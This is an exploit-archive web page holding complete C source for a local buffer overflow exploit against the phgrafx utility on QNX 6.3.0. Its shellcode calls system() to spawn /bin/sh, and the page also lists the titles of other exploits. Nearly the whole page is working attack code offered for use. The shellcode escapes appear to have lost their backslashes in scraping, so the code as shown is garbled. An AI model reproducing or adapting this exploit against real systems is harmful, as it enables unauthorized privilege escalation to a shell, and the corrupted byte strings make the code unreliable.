exploits , vulnerabilities , articles , QNX Realtime Operating System (RTOS) "phgrafx" Local Buffer Overflow Exploit

2005-11-30

QNX Realtime Operating System (RTOS) "phgrafx" Local Buffer Overflow Exploit

Rated as : Moderate Risk 

/* 
* minervini_at_neuralnoise.com (c) 2005, all rights reserved. 
* sample exploit for phgrafx on QNX 6.3.0 x86 
* 
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86 
*/

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif

#ifndef _RET_INIT
# define _RET_INIT (864)
#endif

/* thanks to my friend pi3 that suggested me to call a libc 
* function to make the shellcode way shorter than it was */

char scode[] = "x31xc0" // xor %eax,%eax 
"x50" // push %eax 
"x68x2fx2fx73x68" // push $0x68732f2f 
"x68x2fx62x69x6e" // push $0x6e69622f 
"x54" // push %esp 
"xbbxEFxBExADxDE" // mov $0xDEADBEEF,%ebx 
"xffxd3"; // call *%ebx

unsigned long get_sp (void) { 
__asm__ ("movl %esp, %eax");
}

int main (int argc, char **argv) { 

int i, slen = strlen (scode), offset = 0; 
long ptr, *lptr, addr; 
char *buf; 
void *handle; 

handle = dlopen (NULL, RTLD_LAZY); 
addr = (long) dlsym (handle, "system"); 

for (i = 0; i < 4; i++) { 
char temp = (*((char *) &addr + i) & 0xff); 
if (temp == 0x00 || temp == 0x09 || temp == 0x0a) { 
puts 
("currently system()'s address contains bytes like 0x00, 0x09 or
0x0a, so it probably
won't work since" 
" the application seems to truncate those bytes. BTW you can rely on
functions like
exec*(), spawn*()" 
" or MsgSend*() to get this working.n" 
"more at
http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/");

return (-1); 
} 
} 

memcpy((char *)&scode + 0xf, &addr, 4); 

if (argc > 1) 
offset = strtoul(argv[1], NULL, 0); 

if (!(buf = (char *) malloc(1032))) 
err(1, "malloc()"); 

memset(buf, 0, 1032); 

for (i = 0; i < (_RET_INIT - slen); i++) 
buf[i] = 'A'; // inc %ecx 

printf("shellcode length: %dn", slen); 

for (i = (_RET_INIT - slen); i < _RET_INIT; i++) 
buf[i] = scode[i - (_RET_INIT - slen)]; 

lptr = (long *) (buf + _RET_INIT); 

printf("address: 0x%lxn", ptr = (get_sp () - offset)); 

for (i = 0; i < ((1024 - _RET_INIT) / 4); i++) 
*(lptr + i) = (int) ptr; 

execl(_PATH, "phgrafx", buf, NULL); 

return (0);
} 
securitydot.net - 2005-11-30

Exploits - newest 10 RSS | More

2007-06-15 56546 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33668 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41840 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28929 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19436 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16442 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19099 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16308 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33211 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16969 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit